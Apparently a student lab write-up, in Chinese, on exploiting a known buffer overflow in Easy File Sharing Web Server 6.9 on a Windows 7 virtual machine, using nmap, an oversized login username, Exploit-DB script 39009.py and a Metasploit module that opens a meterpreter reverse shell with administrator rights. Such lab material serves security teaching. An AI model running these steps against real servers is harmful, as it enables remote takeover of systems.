Easy File Sharing Web Server 漏洞的简单利用

Easy File Sharing Web Server 漏洞的简单利用

个人博客:https://fly-pluche.github.io/posts/Easy%20File%20Sharing%20Web%20Server/

背景

  • EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站,文件上传、下载、共享和图片共享等功能的文件共享软件。
  • EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者可通过向forum.ghp文件发送恶意的登录请求利用该漏洞执行任意代码。
  • Easy File Sharing Web Server在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞获取敏感信息。Easy File Sharing Web Server在上传文件时没有正确地过滤某些参数,允许用户通过目录遍历攻击向任意父目录上传文件。
  • 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进而导致服务器被黑客控制。

引自:https://fakercsr.github.io/posts/bb34e501/

Requirement

  • 需求攻击机
  • 靶机(Window)
  • Easy File Sharing Web Server

Easy File Sharing Web Server

这是一个软件,由我们老师提供下载,其他人应该可以搜索下载Easy File Sharing Web Server。

下载之后我们需要把它拖到对应的window虚拟机中。

自行百度:

  • VMware Tools下载
  • VMware Tools下载灰色
  • 下载失败:https://blog.csdn.net/m0_55972178/article/details/118533231(如果用法二,在自带的edge浏览器好像比较容易下载)

Work

下载

下载的过程就一路点。

当然可以修改安装路径。

直接点击Try it!

image-20211105220648287

image-20211111211911041

得到靶机ip

输入ipconfig

扫描靶机端口

用linux扫window7

可能会扫不到,这时候就需要检测window7的防火墙是否被关闭,需要关闭防火墙。

image-20211111224124677

nmap ip

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pYHFm7Ct-1639571790661)(C:\Users\BlackFriday\AppData\Roaming\Typora\typora-user-images\image-20211105215819878.png)]

发现开放的80端口

nmap -sV 目标靶机ip地址 

不知道为什么,我得添加一个-Pn,默认目标靶机在线:

nmap -Pn -sV 目标靶机ip地址 

image-20211104122232948

发现其开放Easy File Sharing Web Server httpd 6.9,这个版本存在缓冲区溢出漏洞:

漏洞利用

利用手动注入使缓冲区溢出

在浏览器中输入:

目标靶机ip地址:80   (使用英文符号以及无空格)

image-20211112160121792

进入了 Easy File Sharing Web Server的登入页

该登陆页面username存在溢出漏洞

也就是当我们在Username中输入过长的用户名时,该服务程序会发生缓冲区溢出

for(int i=0;i<5000;i++){
cout<<1;
}

复制打印的5000个字符,输入Username,然后直接扥入。

image-20211112160342650

发现网页无响应

打开靶机发现,该程序已崩溃,这是因为输入的字符覆盖了程序原本的返回地址,导致程序转入非法地址崩溃。

如果将这些字符改为攻击脚本,让返回的地址为我们的攻击木马,可以进一步利用漏洞。

image-20211112160409576

利用kali自带的攻击脚本

在靶机上重启服务程序,在kali输入:

searchsploit easy file sharing

这一行命令的功能是:在kali自带的漏洞利用脚本库中寻找easy file sharing的漏洞利用脚本

image-20211112160556011

这里使用39009.py,其他攻击脚本同样奏效。

Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)  

这个脚本是专门攻击Easy File Sharing Web Server httpd 7.2 版本的

但是其对Easy File Sharing Web Server httpd 6.9版本同样有效,并且它的执行效果是让服务器弹计算机并崩溃

脚本命令如下:

python /usr/share/exploitdb/exploits/windows/remote/39009.py 目标靶机ip地址 80

image-20211104125237585

打开靶机,发现计算器弹出,并且程序崩溃。

image-20211112160802677

利用metasploit进行漏洞利用

在终端输入

msfconsole

msf启动完成后输入,找到EasyFileSharing的漏洞利用模块

search EasyFileSharing

image-20211104131955240

选择 2015年的这个利用模块,输入:

use exploit/windows/http/easyfilesharing_seh

因为目标靶机还没设置,所以msf会报错No payload configured, defaulting to windows/meterpreter/reverse_tcp

接下来进行配置

show options

image-20211104132746431

配值目标靶机地址:

set RHOSTS 目标靶机的ip地址

image-20211104132946318

然后执行攻击模块输入:

exploit

image-20211104133104393

模块执行成功,可以输入自己想输入的命令

image-20211104133225913

也可以查看自己目前的权限

PLAINTEXT
shell
whoami

发现已经拿到管理员权限

image-20211104133335256

/note/raw/master/img/20211104133226.png)

也可以查看自己目前的权限

PLAINTEXT
shell
whoami

发现已经拿到管理员权限

[外链图片转存中…(img-DjKKj84i-1639571790676)]

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值